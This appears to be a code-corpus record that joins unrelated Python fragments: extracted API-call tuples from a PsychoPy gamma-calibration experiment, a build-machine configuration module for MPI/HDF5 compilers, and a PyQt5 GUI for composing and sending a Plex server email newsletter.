"('info_gamma.pickle')\n", (873, 894), False, 'from psychopy.tools.filetools import fromFile, toFile\n'), ((1277, 1310), 'psychopy.tools.filetools.toFile', 'toFile', (['"""info_gamma.pickle"""', 'info'], {}), "('info_gamma.pickle', info)\n", (1283, 1310), False, 'from psychopy.tools.filetools import fromFile, toFile\n'), ((1321, 1332), 'psychopy.core.quit', 'core.quit', ([], {}), '()\n', (1330, 1332), False, 'from psychopy import visual, core, event, gui, data\n'), ((1414, 1430), 'time.localtime', 'time.localtime', ([], {}), '()\n', (1428, 1430), False, 'import time\n'), ((1966, 2018), 'psychopy.visual.filters.makeGrating', 'filters.makeGrating', (['pixels', '(0)', 'cyclesSpace'], {'phase': '(0)'}), '(pixels, 0, cyclesSpace, phase=0)\n', (1985, 2018), False, 'from psychopy.visual import filters\n'), ((2038, 2219), 'psychopy.visual.GratingStim', 'visual.GratingStim', (['win'], {'texRes': 'pixels', 'mask': '"""circle"""', 'size': '(pixels * 2)', 'sf': '(1.0 / pixels)', 'ori': '(90)', 'tex': "(noiseMatrix * info['lumModNoise'] + lumGratings[0] * info['lumModLum'])"}), "(win, texRes=pixels, mask='circle', size=pixels * 2, sf=\n 1.0 / pixels, ori=90, tex=noiseMatrix * info['lumModNoise'] + \n lumGratings[0] * info['lumModLum'])\n", (2056, 2219), False, 'from psychopy import visual, core, event, gui, data\n'), ((2343, 2508), 'psychopy.visual.GratingStim', 'visual.GratingStim', (['win'], {'texRes': 'pixels', 'mask': '"""circle"""', 'size': '(pixels * 2)', 'sf': '(1.0 / pixels)', 'ori': '(90)', 'tex': "(noiseMatrix * info['contrastModNoise'] * lumGratings[1])"}), "(win, texRes=pixels, mask='circle', size=pixels * 2, sf=\n 1.0 / pixels, ori=90, tex=noiseMatrix * info['contrastModNoise'] *\n lumGratings[1])\n", (2361, 2508), False, 'from psychopy import visual, core, event, gui, data\n'), ((2546, 2600), 'psychopy.visual.filters.makeGrating', 'filters.makeGrating', (['pixels', '(0)', 'cyclesSpace'], {'phase': '(180)'}), '(pixels, 0, cyclesSpace, phase=180)\n', (2565, 2600), False, 'from psychopy.visual import filters\n'), ((2620, 2801), 'psychopy.visual.GratingStim', 'visual.GratingStim', (['win'], {'texRes': 'pixels', 'mask': '"""circle"""', 'size': '(pixels * 2)', 'sf': '(1.0 / pixels)', 'ori': '(90)', 'tex': "(noiseMatrix * info['lumModNoise'] + lumGratings[2] * info['lumModLum'])"}), "(win, texRes=pixels, mask='circle', size=pixels * 2, sf=\n 1.0 / pixels, ori=90, tex=noiseMatrix * info['lumModNoise'] + \n lumGratings[2] * info['lumModLum'])\n", (2638, 2801), False, 'from psychopy import visual, core, event, gui, data\n'), ((2924, 3089), 'psychopy.visual.GratingStim', 'visual.GratingStim', (['win'], {'texRes': 'pixels', 'mask': '"""circle"""', 'size': '(pixels * 2)', 'sf': '(1.0 / pixels)', 'ori': '(90)', 'tex': "(noiseMatrix * info['contrastModNoise'] * lumGratings[3])"}), "(win, texRes=pixels, mask='circle', size=pixels * 2, sf=\n 1.0 / pixels, ori=90, tex=noiseMatrix * info['contrastModNoise'] *\n lumGratings[3])\n", (2942, 3089), False, 'from psychopy import visual, core, event, gui, data\n'), ((3208, 3372), 'psychopy.data.StairHandler', 'data.StairHandler', ([], {'startVal': "info['highGamma']", 'nTrials': "info['nTrials']", 'stepSizes': '[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05]', 'stepType': '"""lin"""', 'nUp': '(1)', 'nDown': '(1)'}), "(startVal=info['highGamma'], nTrials=info['nTrials'],\n stepSizes=[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05], stepType='lin',\n nUp=1, nDown=1)\n", (3225, 3372), False, 'from psychopy import visual, core, event, gui, data\n'), ((3400, 3563), 'psychopy.data.StairHandler', 'data.StairHandler', ([], {'startVal': "info['lowGamma']", 'nTrials': "info['nTrials']", 'stepSizes': '[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05]', 'stepType': '"""lin"""', 'nUp': '(1)', 'nDown': '(1)'}), "(startVal=info['lowGamma'], nTrials=info['nTrials'],\n stepSizes=[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05], stepType='lin',\n nUp=1, nDown=1)\n", (3417, 3563), False, 'from psychopy import visual, core, event, gui, data\n'), ((3714, 3733), 'psychopy.event.clearEvents', 'event.clearEvents', ([], {}), '()\n', (3731, 3733), False, 'from psychopy import visual, core, event, gui, data\n'), ((4577, 4596), 'numpy.random.random', 'num.random.random', ([], {}), '()\n', (4594, 4596), True, 'import numpy as num\n'), ((4734, 4751), 'builtins.range', 'range', (['cyclesTime'], {}), '(cyclesTime)\n', (4739, 4751), False, 'from builtins import range\n'), ((1565, 1610), 'psychopy.visual.TextStim', 'visual.TextStim', (['win'], {'text': '"""building stimuli"""'}), "(win, text='building stimuli')\n", (1580, 1610), False, 'from psychopy import visual, core, event, gui, data\n'), ((3834, 3849), 'psychopy.event.getKeys', 'event.getKeys', ([], {}), '()\n', (3847, 3849), False, 'from psychopy import visual, core, event, gui, data\n'), ((4643, 4659), 'numpy.arange', 'num.arange', (['(0)', '(4)'], {}), '(0, 4)\n', (4653, 4659), True, 'import numpy as num\n'), ((4693, 4714), 'numpy.arange', 'num.arange', (['(3)', '(-1)', '(-1)'], {}), '(3, -1, -1)\n', (4703, 4714), True, 'import numpy as num\n'), ((5213, 5228), 'builtins.next', 'next', (['stairCase'], {}), '(stairCase)\n', (5217, 5228), False, 'from builtins import next\n'), ((2258, 2311), 'psychopy.visual.filters.makeGrating', 'filters.makeGrating', (['pixels', '(0)', 'cyclesSpace'], {'phase': '(90)'}), '(pixels, 0, cyclesSpace, phase=90)\n', (2277, 2311), False, 'from psychopy.visual import filters\n'), ((2838, 2892), 'psychopy.visual.filters.makeGrating', 'filters.makeGrating', (['pixels', '(0)', 'cyclesSpace'], {'phase': '(270)'}), '(pixels, 0, cyclesSpace, phase=270)\n', (2857, 2892), False, 'from psychopy.visual import filters\n'), ((4923, 4937), 'builtins.range', 'range', (['nFrames'], {}), '(nFrames)\n', (4928, 4937), False, 'from builtins import range\n'), ((3988, 3999), 'psychopy.core.quit', 'core.quit', ([], {}), '()\n', (3997, 3999), False, 'from psychopy import visual, core, event, gui, data\n'), ((5338, 5362), 'numpy.random.randint', 'num.random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (5356, 5362), True, 'import numpy as num\n')]
|
################################################################################
# #
# MACHINE-SPECIFIC FUNCTIONS #
# #
# OPTIONS: #
# COMPILER : PATH TO COMPILER EXECUTABLE #
# GSL_DIR : PATH TO GSL INSTALLATION #
# MPI_DIR : PATH TO MPI INSTALLATION #
# HDF5_DIR : PATH TO HDF5 INSTALLATION #
# EXECUTABLE : BINARY WRAPPER USED TO LAUNCH BHLIGHT #
# #
# MPI_DIR AND HDF5_DIR ARE NOT REQUIRED IF COMPILER HANDLES HEADERS AND #
# LIBRARIES FOR THESE DEPENDENCIES #
# #
################################################################################
import util
import sys
import os
# module purge
# module load gcc
# module load openmpi
# module load hdf5-parallel
# module load python
flags_base = '-Wall -Werror -fdiagnostics-color -fopenmp'
fcflags = '-lmpi_usempif08 -lmpi_usempi_ignore_tkr -lmpi_mpifh'
fflags_base = '-fdiagnostics-color -fopenmp -cpp'
def matches_host():
import re
host = os.uname()[1]
my_host = re.compile(r'ba\d+')
return bool(my_host.match(host))
def get_options():
host = {}
host['NAME'] = os.uname()[1]
host['COMPILER'] = 'h5pcc'
#host['COMPILER'] = '/usr/local/hdf5-parallel/bin/h5pcc'
host['COMPILER_FLAGS'] = flags_base + ' ' + fcflags + ' ' + '-O2 -march=native'
host['DEBUG_FLAGS'] = flags_base + ' ' + fcflags + ' ' + '-g -O0'
# or system GSL if it exists
host['GSL_DIR'] = os.path.join(os.environ['HOME'],'local-gnu-openmpi')
host['FORTRAN_COMP'] = 'h5pfc'
#host['FORTRAN_COMP'] = '/usr/local/hdf5-parallel/bin/h5pfc'
host['FCFLAGS'] = fflags_base + ' ' + '-O2'
host['FDEBUG_FLAGS'] = fflags_base + ' ' + '-g -O0'
host['FORTLINK'] = '-lgfortran -lhdf5_fortran'
host['FORTLIB'] = ''
host['EXECUTABLE'] = 'mpirun'
return host
|
[
"os.uname",
"os.path.join",
"re.compile"
] |
[((1595, 1615), 're.compile', 're.compile', (['"""ba\\\\d+"""'], {}), "('ba\\\\d+')\n", (1605, 1615), False, 'import re\n'), ((2036, 2089), 'os.path.join', 'os.path.join', (["os.environ['HOME']", '"""local-gnu-openmpi"""'], {}), "(os.environ['HOME'], 'local-gnu-openmpi')\n", (2048, 2089), False, 'import os\n'), ((1569, 1579), 'os.uname', 'os.uname', ([], {}), '()\n', (1577, 1579), False, 'import os\n'), ((1711, 1721), 'os.uname', 'os.uname', ([], {}), '()\n', (1719, 1721), False, 'import os\n')]
|
import logging
from typing import AsyncGenerator
from aioredis import ConnectionError
from aioredis import RedisError
from app.db.redis import redis
async def get_redis() -> AsyncGenerator:
try:
await redis.set("health_check", "OK")
yield redis
except ConnectionError as e:
logging.error(f"connection to redis failed: {e}")
finally:
try:
await redis.close()
except RedisError as e:
logging.error(f"closing connection to redis failed: {e}")
|
[
"app.db.redis.redis.set",
"logging.error",
"app.db.redis.redis.close"
] |
[((217, 248), 'app.db.redis.redis.set', 'redis.set', (['"""health_check"""', '"""OK"""'], {}), "('health_check', 'OK')\n", (226, 248), False, 'from app.db.redis import redis\n'), ((310, 359), 'logging.error', 'logging.error', (['f"""connection to redis failed: {e}"""'], {}), "(f'connection to redis failed: {e}')\n", (323, 359), False, 'import logging\n'), ((404, 417), 'app.db.redis.redis.close', 'redis.close', ([], {}), '()\n', (415, 417), False, 'from app.db.redis import redis\n'), ((462, 519), 'logging.error', 'logging.error', (['f"""closing connection to redis failed: {e}"""'], {}), "(f'closing connection to redis failed: {e}')\n", (475, 519), False, 'import logging\n')]
|
import os, sys, titlecase, datetime, json, re, urllib, time, glob
import pathos.multiprocessing as multiprocessing
from email.utils import formataddr
from bs4 import BeautifulSoup
from itertools import chain
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
#
from howdy import resourceDir
from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView
from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service
from howdy.email.email_mygui import HowdyGuestEmailTV
#from howdy.email.email_demo_gui import HowdyEmailDemoGUI
class HowdyEmailGUI( QDialogWithPrinting ):
class EmailSendDialogDelegate( QItemDelegate ):
def __init__( self, model ):
super( HowdyEmailGUI.EmailSendDialogDelegate, self ).__init__( )
assert( isinstance( model, HowdyEmailGUI.EmailSendDialogTableModel ) )
self.model = model
def createEditor( self, parent, option, index ):
index_unproxy = index.model( ).mapToSource( index )
row = index_unproxy.row( )
col = index_unproxy.column( )
if col == 0:
cb = QCheckBox( self )
cb.setChecked( self.model.should_email[ row ] )
return cb
elif index.column( ) == 1:
return QLabel( self.model.emails_full[ row ] )
def setEditorData( self, editor, index ):
index_unproxy = index.model( ).mapToSource( index )
row = index_unproxy.row( )
col = index_unproxy.column( )
if col == 0: # is a QCheckBox
editor.setChecked( self.model.should_email[ row ] )
def editorEvent( self, event, model, option, index ):
index_unproxy = model.mapToSource( index )
row = index_unproxy.row( )
col = index_unproxy.column( )
if event.type( ) == QEvent.MouseButtonPress and col == 0:
is_email = self.model.should_email[ row ]
self.model.setData( index_unproxy, not is_email, Qt.CheckStateRole )
event.accept( )
return True
return False
#
## dont-understand-code here: https://stackoverflow.com/a/59230434/3362358
class EmailSendDialogBooleanDelegate( QItemDelegate ):
def __init__( self, model ):
super( HowdyEmailGUI.EmailSendDialogBooleanDelegate, self ).__init__( )
assert( isinstance( model, HowdyEmailGUI.EmailSendDialogTableModel ) )
self.model = model
def paint(self, painter, option, index):
# Depends on how the data function of your table model is implemented
# 'value' should receive a bool indicate if the checked value.
value = index.data( Qt.CheckStateRole )
self.drawCheck(painter, option, option.rect, value)
self.drawFocus(painter, option, option.rect)
def editorEvent(self, event, model, option, index):
if event.type() == QEvent.MouseButtonRelease:
value = model.data(index, Qt.CheckStateRole )
model.setData(index, not value, Qt.CheckStateRole )
event.accept( )
return True
return False
class EmailSendDialogQSortFilterModel( QSortFilterProxyModel ):
def __init__( self, model ):
super( HowdyEmailGUI.EmailSendDialogQSortFilterModel, self ).__init__( )
self.setSourceModel( model )
model.emitFilterChanged.connect( self.invalidateFilter )
def filterAcceptsRow( self, rowNumber, sourceParent ):
return self.sourceModel( ).filterRow( rowNumber )
class EmailSendDialogTableModel( QAbstractTableModel ):
_headers = [ 'SEND?', 'EMAIL' ]
statusSignal = pyqtSignal( str )
emitFilterChanged = pyqtSignal( )
def __init__( self, emails_array, verify = True ):
super( HowdyEmailGUI.EmailSendDialogTableModel, self ).__init__( )
self.verify = verify
self.emails_array = [ ]
self.emails_full = [ ]
self.should_email = [ ]
self.setEmails( emails_array )
#
##
self.selectTestButton = QPushButton( 'TEST ADDRESS' )
self.selectAllButton = QPushButton( 'ALL ADDRESSES' )
self.sendEmailButton = QPushButton( 'SEND EMAIL' )
self.selectTestButton.clicked.connect( self.selectTest )
self.selectAllButton.clicked.connect( self.selectAll )
self.sendEmailButton.clicked.connect( self.sendEmail )
#
## now other members #2: the "show all emails" and "show selected emails"
self.showAllEmailsButton = QRadioButton( 'ALL EMAILS' )
self.showSelectedEmailsButton = QRadioButton( 'SELECTED EMAILS' )
buttonGroup = QButtonGroup( )
buttonGroup.addButton( self.showAllEmailsButton )
buttonGroup.addButton( self.showSelectedEmailsButton )
self.showAllEmailsButton.toggle( )
self.showAllEmailsButton.clicked.connect( self.setFilterShowWhichEmails )
self.showSelectedEmailsButton.clicked.connect( self.setFilterShowWhichEmails )
#
## now other members #3: the QLineEdit doing a regex on filter on names OR emails
self.filterOnNamesOrEmails = QLineEdit( '' )
self.filterRegExp = QRegExp( '.', Qt.CaseInsensitive, QRegExp.RegExp )
self.filterOnNamesOrEmails.textChanged.connect( self.setFilterString )
self.showingEmailsLabel = QLabel( '' )
self.emitFilterChanged.connect( self.showNumberFilterEmails )
self.showNumberFilterEmails( )
def setEmails( self, emails_array ):
def get_email( input_tuple ):
name, email = input_tuple
if name is not None:
name = name.replace('"', '').strip( )
return formataddr((name, email))
return email
self.layoutAboutToBeChanged.emit( )
self.emails_array = emails_array.copy( )
self.emails_full = list(map(get_email, emails_array ) )
self.should_email = [ False ] * len( self.emails_full )
self.should_email[ 0 ] = True
self.layoutChanged.emit( )
self.emitFilterChanged.emit( )
def selectTest( self ):
self.layoutAboutToBeChanged.emit( )
for idx in range( len( self.should_email ) ):
self.should_email[ idx ] = False
self.should_email[ 0 ] = True
self.layoutChanged.emit( )
def selectAll( self ):
self.layoutAboutToBeChanged.emit( )
for idx in range(len( self.should_email ) ):
self.should_email[ idx ] = True
self.layoutChanged.emit( )
def sendEmail( self ):
#
## choose which emails to send
input_tuples = list(map(lambda tup: tup[1], filter(
lambda tup: tup[0] == True,
zip( self.should_email, self.emails_array ) ) ) )
if len( input_tuples ) == 0:
self.statusSignal.emit( 'SENT NO EMAILS.' )
return
#
## now send the emails
time0 = time.time( )
self.statusSignal.emit( 'STARTING TO SEND EMAILS...' )
email_service = get_email_service( verify = self.verify )
mydate = datetime.datetime.now( ).date( )
def _send_email_perproc( input_tuple ):
name, fullEmail = input_tuple
subject = titlecase.titlecase(
'Plex Email Newsletter For %s' % mydate.strftime( '%B %Y' ) )
email.send_individual_email_full(
self.mainHtml, subject, fullEmail, name = name,
email_service = email_service )
return True
with multiprocessing.Pool( processes = min(
multiprocessing.cpu_count( ), len( input_tuples ) ) ) as pool:
arrs = list( map( _send_email_perproc, input_tuples ) )
self.statusSignal.emit(
'SENT %d EMAILS IN %0.3f SECONDS.' %
( len( input_tuples ), time.time() - time0 ) )
#
## if I have sent out ALL EMAILS, then I mean to update the newsletter
if all(self.should_email): core.set_date_newsletter( )
def columnCount( self, parent ):
return 2
def rowCount( self, parent ):
return len( self.emails_full )
def headerData( self, col, orientation, role ):
if orientation == Qt.Horizontal and role == Qt.DisplayRole:
return 'EMAIL'
def flags( self, index ):
if index.column( ) == 0:
return Qt.ItemIsUserCheckable | Qt.ItemIsEnabled | Qt.ItemIsSelectable
else: return Qt.ItemIsEnabled | Qt.ItemIsSelectable
def data( self, index, role ):
if not index.isValid( ): return None
row = index.row( )
col = index.column( )
if role == Qt.DisplayRole and col == 1:
return self.emails_full[ row ]
elif role == Qt.CheckStateRole and col == 0:
return self.should_email[ row ]
def setData( self, index, val, role ):
if not index.isValid( ): return False
row = index.row( )
col = index.column( )
if col == 1: return False
if role != Qt.CheckStateRole: return False
self.should_email[ row ] = val
return True
def filterRow( self, rowNumber ):
assert( rowNumber >= 0 )
assert( rowNumber < len( self.emails_full ) )
name, email = self.emails_array[ rowNumber ]
#
## if not one of selected emails and ONLY show selected emails...
if not self.showAllEmailsButton.isChecked( ) and not self.should_email[ rowNumber ]: return False
if self.filterRegExp.indexIn( name ) != -1: return True
if self.filterRegExp.indexIn( email ) != -1: return True
return False
def showNumberFilterEmails( self ):
num_emails = len(list(filter(self.filterRow, range(len(self.emails_full)))))
self.showingEmailsLabel.setText('SHOWING %d EMAILS' % num_emails )
def setFilterString( self, newString ):
mytext = newString.strip( )
if len( mytext ) == 0: mytext = '.'
self.filterRegExp = QRegExp( mytext, Qt.CaseInsensitive, QRegExp.RegExp )
self.emitFilterChanged.emit( )
def setFilterShowWhichEmails( self ):
self.emitFilterChanged.emit( )
class EmailSendDialogTableView( QTableView ):
def __init__( self, model ):
super( HowdyEmailGUI.EmailSendDialogTableView, self ).__init__( )
proxyModel = HowdyEmailGUI.EmailSendDialogQSortFilterModel( model )
self.setModel( proxyModel )
self.setItemDelegateForColumn(
0, HowdyEmailGUI.EmailSendDialogBooleanDelegate( model ) )
#
self.setShowGrid( True )
self.verticalHeader( ).setSectionResizeMode( QHeaderView.Fixed )
self.horizontalHeader( ).setSectionResizeMode( QHeaderView.Fixed )
self.setSelectionBehavior( QAbstractItemView.SelectRows )
self.setSelectionMode( QAbstractItemView.SingleSelection )
self.setSortingEnabled( True )
#
self.setColumnWidth( 0, 180 )
self.setColumnWidth( 1, 180 )
#
toBotAction = QAction( self )
toBotAction.setShortcut( 'End' )
toBotAction.triggered.connect( self.scrollToBottom )
self.addAction( toBotAction )
#
toTopAction = QAction( self )
toTopAction.setShortcut( 'Home' )
toTopAction.triggered.connect( self.scrollToTop )
self.addAction( toTopAction )
def getValidIndexRow( self ):
index_valid = max(
filter(
lambda index: index.column( ) == 0,
self.selectionModel( ).selectedIndexes( ) ) )
return index_valid.row( )
def resizeTableColumns( self, width ):
self.setColumnWidth( 0, int( 0.07 * width ) )
self.setColumnWidth( 1, int( 0.93 * width ) )
class EmailSendDialog( QDialogWithPrinting ):
def __init__( self, parent ):
super( HowdyEmailGUI.EmailSendDialog, self ).__init__(
parent, isIsolated = False, doQuit = False )
self.setModal( True )
self.verify = parent.verify
self.setWindowTitle( 'SEND EMAILS' )
self.emailSendDialogTableModel = HowdyEmailGUI.EmailSendDialogTableModel(
parent.emails_array, self.verify )
emailSendDialogTableView = HowdyEmailGUI.EmailSendDialogTableView(
self.emailSendDialogTableModel )
self.statusLabel = QLabel( )
#
myLayout = QVBoxLayout( )
self.setLayout( myLayout )
#
topLayout = QGridLayout( )
topWidget = QWidget( self )
topWidget.setLayout( topLayout )
topLayout.addWidget( self.emailSendDialogTableModel.selectTestButton, 0, 0, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.selectAllButton, 0, 1, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.sendEmailButton, 0, 2, 1, 1 )
#
topLayout.addWidget( QLabel( 'FILTER' ), 1, 0, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.filterOnNamesOrEmails, 1, 1, 1, 2 )
#
topLayout.addWidget( QLabel( 'SHOW EMAILS' ), 2, 0, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.showAllEmailsButton, 2, 1, 1, 1 )
topLayout.addWidget( self.emailSendDialogTableModel.showSelectedEmailsButton, 2, 2, 1, 1 )
myLayout.addWidget( topWidget )
#
myLayout.addWidget( emailSendDialogTableView )
#
botWidget = QWidget( )
botLayout = QHBoxLayout( )
botWidget.setLayout( botLayout )
botLayout.addWidget( self.statusLabel )
botLayout.addWidget( self.emailSendDialogTableModel.showingEmailsLabel )
myLayout.addWidget( botWidget )
#
self.emailSendDialogTableModel.statusSignal.connect( self.statusLabel.setText )
#
self.setFixedWidth( 500 )
self.setFixedHeight( 600 )
#self.setFixedWidth( self.sizeHint( ).width( ) )
#self.setFixedHeight( int( 0.5 * self.sizeHint( ).height( ) ) )
emailSendDialogTableView.resizeTableColumns( 500 )
self.hide( )
class PrePostAmbleDialog( QDialogWithPrinting ):
def __init__( self, parent, title = 'Preamble' ):
super( HowdyEmailGUI.PrePostAmbleDialog, self ).__init__(
parent, isIsolated = False )
self.parent = parent
self.sectionNameWidget = QLineEdit( titlecase.titlecase( title ) )
self.testTextButton = QPushButton( 'TEST TEXT' )
self.pngAddButton = QPushButton( 'ADD PNGS' )
self.textEdit = QTextEdit( )
self.statusLabel = QLabel( )
self.setWindowTitle( title )
self.setModal( True )
self.isValidRST = False
#
self.YesButton = QRadioButton( 'YES', self )
self.NoButton = QRadioButton( 'NO', self )
radioButtonsWidget = QWidget( )
radioButtonsLayout = QHBoxLayout( )
radioButtonsWidget.setLayout( radioButtonsLayout )
radioButtonsLayout.addWidget( self.YesButton )
radioButtonsLayout.addWidget( self.NoButton )
self.NoButton.toggle( )
#
self.pngWidget = email_basegui.PNGWidget( self )
self.pngWidget.hide( )
#
myLayout = QVBoxLayout( )
self.setLayout( myLayout )
#
topLayout = QGridLayout( )
topWidget = QWidget( )
topWidget.setLayout( topLayout )
topLayout.addWidget( QLabel( 'SECTION' ), 0, 0, 1, 1 )
topLayout.addWidget( self.sectionNameWidget, 0, 1, 1, 2 )
topLayout.addWidget( radioButtonsWidget, 1, 0, 1, 2 )
topLayout.addWidget( self.testTextButton, 1, 2, 1, 1 )
topLayout.addWidget( self.pngAddButton, 1, 3, 1, 1 )
myLayout.addWidget( topWidget )
#
myLayout.addWidget( self.textEdit )
myLayout.addWidget( self.statusLabel )
#
self.testTextButton.clicked.connect( self.checkRST )
self.pngAddButton.clicked.connect( self.addPNGs )
#
self.setFixedHeight( 650 )
self.setFixedWidth( self.sizeHint( ).width( ) )
def checkRST( self ):
self.statusLabel.setText( '' )
myStr = self.textEdit.toPlainText( ).strip( )
if len( myStr ) == 0:
self.statusLabel.setText( 'INVALID RESTRUCTUREDTEXT' )
self.isValidRST = False
return
sectionTitle = self.sectionNameWidget.text( ).strip( )
mainText = '\n'.join([ sectionTitle, ''.join([ '=' ] * len( sectionTitle )), '', myStr ])
if not check_valid_RST( mainText ):
self.statusLabel.setText( 'INVALID RESTRUCTUREDTEXT' )
self.isValidRST = False
return
self.isValidRST = True
html = convert_string_RST( mainText )
self.statusLabel.setText( 'VALID RESTRUCTUREDTEXT' )
#
qdl = QDialogWithPrinting( self, doQuit = False, isIsolated = True )
qdl.setWindowTitle( 'HTML EMAIL BODY' )
qte = HtmlView( qdl )
qter = QTextEdit( self )
qter.setReadOnly( True )
qter.setPlainText( '%s\n' % html )
qdlLayout = QVBoxLayout( )
qdl.setLayout( qdlLayout )
tw = QTabWidget( self )
tw.addTab( qte, 'RENDERED HTML' )
tw.addTab( qter, 'RAW HTML' )
qdlLayout.addWidget( tw )
qf = QFont( )
qf.setFamily( 'Consolas' )
qf.setPointSize( int( 11 ) )
qfm = QFontMetrics( qf )
qdl.setFixedWidth( 85 * qfm.width( 'A' ) )
qdl.setFixedHeight( 550 )
qte.setHtml( html )
qdl.show( )
#
##
result = qdl.exec_( )
def sendValidRST( self, showSection = False ):
if self.NoButton.isChecked( ): return ""
#
myStr = self.textEdit.toPlainText( ).strip( )
sectionTitle = self.sectionNameWidget.text( ).strip( )
if not showSection or len( sectionTitle ) == 0: mainText = myStr
else: mainText = '\n'.join([ sectionTitle, ''.join([ '=' ] * len( sectionTitle )), '', myStr ])
if not check_valid_RST( mainText ):
return ""
return mainText
def closeEvent( self, evt ):
self.hide( )
def addPNGs( self ):
self.pngWidget.show( )
def getHTML( self ):
sectionTitle = self.sectionNameWidget.text( ).strip( )
mainText = '\n'.join([
sectionTitle,
'\n'.join([ '=' ] * len( sectionTitle ) ), '',
self.textEdit.toPlainText( ).strip( ) ])
if not check_valid_RST( mainText ):
return False, None
#
html = convert_string_RST( mainText )
return True, html
def __init__( self, doLocal = True, doLarge = False, verify = True ):
super( HowdyEmailGUI, self ).__init__( None )
self.resolution = 1.0
self.verify = verify
self.htmlString = ''
if doLarge:
self.resolution = 2.0
for fontFile in glob.glob( os.path.join( resourceDir, '*.ttf' ) ):
QFontDatabase.addApplicationFont( fontFile )
self.setStyleSheet("""
QWidget {
font-family: Consolas;
font-size: %d;
}""" % ( int( 11 * self.resolution ) ) )
dat = core.checkServerCredentials(
doLocal = doLocal, verify = self.verify )
if dat is None:
raise ValueError( "Error, cannot access the Plex media server." )
self.fullURL, self.token = dat
#
self.checkEmailButton = QPushButton( 'CHECK EMAIL', self )
self.emailListButton = QPushButton( 'PLEX GUESTS', self )
#
self.preambleButton = QPushButton( 'PREAMBLE', self )
self.postambleButton = QPushButton( 'POSTAMBLE', self )
#
self.emailDialogButton = QPushButton( 'EMAIL DIALOG', self )
#
self.emailDialogButton.setEnabled( False )
self.checkEmailButton.setEnabled( True )
self.emailComboBox = QComboBox( )
#
self.setWindowTitle( 'HOWDY EMAIL NEWSLETTER' )
self.preambleDialog = HowdyEmailGUI.PrePostAmbleDialog( self, title = 'PREAMBLE' )
self.postambleDialog = HowdyEmailGUI.PrePostAmbleDialog( self, title = 'POSTAMBLE' )
self.preamble = ''
self.postamble = ''
self.getContacts( self.token )
myLayout = QGridLayout( )
self.setLayout( myLayout )
#
self.emails_array = [( emailName, emailAddress ), ] + get_email_contacts_dict(
core.get_mapped_email_contacts(
self.token, verify = self.verify ), verify = self.verify )
self.emailSendDialog = HowdyEmailGUI.EmailSendDialog( self )
#
myLayout.addWidget( self.checkEmailButton, 0, 0, 1, 1 )
myLayout.addWidget( self.emailDialogButton, 0, 1, 1, 1 )
myLayout.addWidget( self.preambleButton, 1, 0, 1, 1 )
myLayout.addWidget( self.postambleButton, 1, 1, 1, 1 )
myLayout.addWidget( self.emailListButton, 2, 0, 1, 2 )
#
self.checkEmailButton.clicked.connect( self.createSummaryEmail )
self.preambleButton.clicked.connect( self.preambleDialog.show )
self.postambleButton.clicked.connect( self.postambleDialog.show )
self.emailDialogButton.clicked.connect( self.emailSendDialog.show )
self.emailListButton.clicked.connect( self.showEmails )
#
self.show( )
def showEmails( self ):
qdl = QDialogWithPrinting( self, doQuit = False, isIsolated = True )
qdl.setModal( True )
qdl.setWindowTitle( 'PLEX MAPPED GUEST EMAILS' )
myLayout = QVBoxLayout( )
qdl.setLayout( myLayout )
def email_name_dict( tup ):
name, email = tup
data_dict = { 'email' : email }
if name is not None:
data_dict[ 'name' ] = name
return data_dict
emailMapping = list(
map( email_name_dict, self.emails_array ) )
pgetv = HowdyGuestEmailTV(
qdl, emailMapping, self.resolution )
myLayout.addWidget( pgetv )
qdl.setFixedWidth( pgetv.totalWidth )
qdl.setFixedHeight( pgetv.totalHeight )
qdl.show( )
result = qdl.exec_( )
def createSummaryEmail( self ):
self.emailDialogButton.setEnabled( False )
preambleText = self.preambleDialog.sendValidRST( True )
postambleText = self.postambleDialog.sendValidRST( True )
self.htmlString, self.restructuredTextString = email.get_summary_html(
self.token, fullURL = self.fullURL,
preambleText = preambleText, postambleText = postambleText )
if len( self.htmlString ) == 0: return
#
qdl = QDialogWithPrinting( self, doQuit = False, isIsolated = True )
qdl.setWindowTitle( 'HTML EMAIL BODY' )
qte = HtmlView( qdl )
qter = QTextEdit( self )
qter.setReadOnly( True )
qter.setPlainText( '%s\n' % self.htmlString )
qterst = QTextEdit( self )
qterst.setReadOnly( True )
qterst.setPlainText( '%s\n' % self.restructuredTextString )
qdlLayout = QVBoxLayout( )
qdl.setLayout( qdlLayout )
tw = QTabWidget( self )
tw.addTab( qte, 'RENDERED HTML' )
tw.addTab( qter, 'RAW HTML' )
tw.addTab( qterst, 'RESTRUCTURED TEXT' )
qdlLayout.addWidget( tw )
qf = QFont( )
qf.setFamily( 'Consolas' )
qf.setPointSize( int( 11 ) )
qfm = QFontMetrics( qf )
qdl.setFixedWidth( 85 * qfm.width( 'A' ) )
qdl.setFixedHeight( 550 )
qte.setHtml( self.htmlString )
qdl.show( )
#
##
result = qdl.exec_( )
self.emailDialogButton.setEnabled( True )
# self.testEmailButton.setEnabled( True )
def emailDialog( self ):
qd = HowdyEmailGUI.EmailSendDialog( self )
result = qd.exec_( )
def getContacts( self, token ):
emails = core.get_mapped_email_contacts(
token, verify = self.verify )
if len(emails) == 0: return
self.checkEmailButton.setEnabled( True )
#
## now do some google client magic to get the names
name_emails = get_email_contacts_dict(
emails, verify = self.verify )
self.emailComboBox.clear( )
def get_email( input_tuple ):
name, email = input_tuple
if name is not None:
return '%s <%s>' % ( name, email )
return email
self.emailComboBox.addItems(
sorted( map( get_email, name_emails ) ) )
self.emailComboBox.setEditable( False )
self.emailComboBox.setCurrentIndex( 0 )
|
[
"titlecase.titlecase",
"howdy.email.email_basegui.PNGWidget",
"howdy.email.email.send_individual_email_full",
"howdy.core.check_valid_RST",
"howdy.core.core.get_mapped_email_contacts",
"os.path.join",
"howdy.core.core.set_date_newsletter",
